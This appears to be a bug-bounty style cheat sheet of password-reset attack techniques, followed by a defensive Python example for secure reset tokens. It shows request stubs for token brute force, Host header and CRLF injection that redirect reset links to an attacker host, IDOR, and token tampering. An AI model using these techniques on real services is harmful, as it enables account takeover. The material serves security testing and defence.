Password Reset Functionality
Below are some references for attacks on password reset functionality.

Concept

In this class of vulnerability the attacker targets the password reset functionality of the application. A successful attack can lead to full account takeover. Below are some ways this functionality is commonly attacked.

Ways to bypass

Include your email as a second parameter


Brute force the password reset token

    POST /reset
    [....]
    [email protected]&token={bruteforce}

Try to use your own reset token against the victim's account

    POST /reset
    [....]
    [email protected]&token={yourtoken}

Host header injection (try changing the Host header; if the reset link is built from it, the token may be sent to the attacker's server)

    POST /reset
    Host: Attacker.com

Try figuring out how the tokens are generated

For example:

    They might be generated based on a timestamp.
    They might be generated based on the user id.
    They might be generated based on the email id.

CRLF Injection

    POST /reset
    [....]

CRLF:

    POST /resetPassword?%0a%0dHost:attacker.tld (x-host, true-client-ip, x-forwarded...)

Business logic

    While inviting users into your account/organization, you can also try
    inviting company emails and adding a new field "password": "example123"
    or "pass": "example123" to the request. You may end up resetting a user's
    password. (Company emails can be found at hunter.io.)

JSON array

    POST /reset
    [....]

Token leakage via Referer header

    POST /reset
    [....]
    Referer: https://xyz.com/token={token}

IDOR for password reset (we can change the id parameter)

    POST /reset
    [....]
    id=1234&

Some other ways

    Race condition
    Completely remove the token
    Change it to 00000000...
    Use a null/nil value
    Try an expired token
    Reuse an old password reset token
    Try an array of old tokens
    Change one character at the beginning/end to see whether the token is actually evaluated
    Use Unicode characters to spoof the email address
    Try [email protected]&[email protected], using %20 or | as separators
    Change the request method (GET, PUT, POST etc.) and/or content type (XML <> JSON)
    Match a bad response and replace it with a good one
    Use a super long string
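The token-generation guesses and the "other ways" list above map onto a small set of server-side properties. The following is an added defender's reference, not code from the original page: tokens are random (never derived from timestamp, user id or email), stored only as a hash, time-limited, single-use, bound to one account, and the reset URL comes from a configured base URL rather than the Host header. Class and field names, the in-memory store and the sample user data are all constructed for this example.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass

TOKEN_TTL = 15 * 60  # seconds a reset token stays valid (example value)
# Configured base URL for reset links; never built from the request's Host header.
BASE_URL = "https://app.example.invalid"


@dataclass
class ResetRecord:
    user_id: int
    email: str
    expires_at: float
    used: bool = False


class ResetService:
    """Issue and redeem password reset tokens with the properties an attacker probes for."""

    def __init__(self, users, clock=time.time):
        self.users = users      # email -> user_id (constructed sample data)
        self.records = {}       # sha256(token) -> ResetRecord; the raw token is never stored
        self.clock = clock      # injectable for testing expiry

    def issue(self, email):
        """Return a reset URL for a known email, else None (caller should respond identically)."""
        user_id = self.users.get(email)
        if user_id is None:
            return None
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, unrelated to time/id/email
        digest = hashlib.sha256(token.encode()).hexdigest()
        self.records[digest] = ResetRecord(user_id, email, self.clock() + TOKEN_TTL)
        return f"{BASE_URL}/reset?token={token}"

    def redeem(self, token, email):
        """Consume a token for the given email; return the user_id on success, None otherwise."""
        # Reject null, empty, array and other non-string values before anything else.
        if not isinstance(token, str) or not isinstance(email, str) or not token or not email:
            return None
        rec = self.records.get(hashlib.sha256(token.encode()).hexdigest())
        if rec is None or rec.used or self.clock() > rec.expires_at:
            return None  # unknown, reused or expired token
        # Token is bound to exactly one account; constant-time compare on bytes handles non-ASCII.
        if not hmac.compare_digest(rec.email.encode(), email.encode()):
            return None
        rec.used = True  # single use: a second redeem of the same token fails
        return rec.user_id
```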